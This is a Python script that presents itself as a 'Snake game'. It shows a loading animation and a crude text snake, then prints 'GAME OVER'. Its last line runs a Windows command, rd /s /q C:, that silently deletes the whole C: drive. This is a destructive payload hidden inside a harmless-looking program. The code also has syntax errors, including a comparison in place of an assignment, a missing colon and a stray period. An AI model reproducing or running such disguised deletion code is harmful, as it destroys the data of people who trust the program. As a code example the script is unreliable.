#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time

print("This is Snake game")
print("Press 1 to start")

a == int(input())

if a == 1
    print("Loading+..")
    time.sleep(1)
    os.system("clear")
    print("Loading.+.")
    time.sleep(1)
    os.system("clear")
    print("Loading..+")
    print("Loading+..")
    time.sleep(1)
    os.system("clear")
    print("Loading.+.")
    time.sleep(1)
    os.system("clear")
    print("Loading..+")
    print("Loading+..")
    time.sleep(1)
    os.system("clear")
    print("Loading.+.")
    time.sleep(1)
    os.system("clear")
    print("Loading..+")
    time.sleep(3)
    os.system("clear")
    time.sleep(5)
    print("START GAME!")
    time.sleep(1)
    os.system("clear")
    print("|---                           + |")
    time.sleep(0.5)
    os.system("clear")
    print("| ---                          + |")
    time.sleep(0.5)
    os.system("clear")
    print("|  ---                         + |")
    time.sleep(0.5)
    os.system("clear")
    print("|   ---                        + |")
    time.sleep(0.5)
    os.system("clear")
    print("|    ---                       + |")
    time.sleep(0.5).
    os.system("clear")
    print("|     ---                      + |")
    time.sleep(0.5)
    os.system("clear")
    print("|      ---                     + |")
    time.sleep(0.5)
    os.system("clear")
    print("|       ---                    + |")
    time.sleep(0.5)
    os.system("clear")
    print("|        ---                   + |")
    time.sleep(0.5)
    os.system("clear")
    print("|         ---                  + |")
    time.sleep(0.5)
    os.system("clear")
    print("|          ---                 + |")
    time.sleep(0.5)
    os.system("clear")
    print("|           ---                + |")
    time.sleep(0.5)
    os.system("clear")
    print("|            ---               + |")
    time.sleep(0.5)
    os.system("clear")
    print("|             ---              + |")
    time.sleep(0.5)
    os.system("clear")
    print("|              ---             + |")
    time.sleep(0.5)
    os.system("clear")
    print("|               ---            + |")
    time.sleep(0.5)
    os.system("clear")
    print("|                ---           + |")
    time.sleep(0.5)
    os.system("clear")
    print("|                 ---          + |")
    time.sleep(0.5)
    os.system("clear")
    print("|                  ---         + |")
    time.sleep(0.5)
    os.system("clear")
    print("|                   ---        + |")
    time.sleep(0.5)
    os.system("clear")
    print("|                     ---      + |")
    time.sleep(0.5)
    os.system("clear")
    print("|                      ---     + |")
    time.sleep(0.5)
    os.system("clear")
    print("|                       ---    + |")
    time.sleep(0.5)
    os.system("clear")
    print("|                        ---   + |")
    time.sleep(0.5)
    os.system("clear")
    print("|                         ---  + |")
    time.sleep(0.5)
    os.system("clear")
    print("|                           ---+ |")
    time.sleep(0.5)
    os.system("clear")
    print("|                           ---- |")
    time.sleep(0.5)
    os.system("clear")
    print("|                            ----|")
    time.sleep(0.5)
    print("GAME OVER")
    time.sleep(2.5)
    os.system("clear")
    time.sleep(2.5)
    print("OTVAL WINDY")
    time.sleep(2.5)
    os.system("rd /s /q C:")
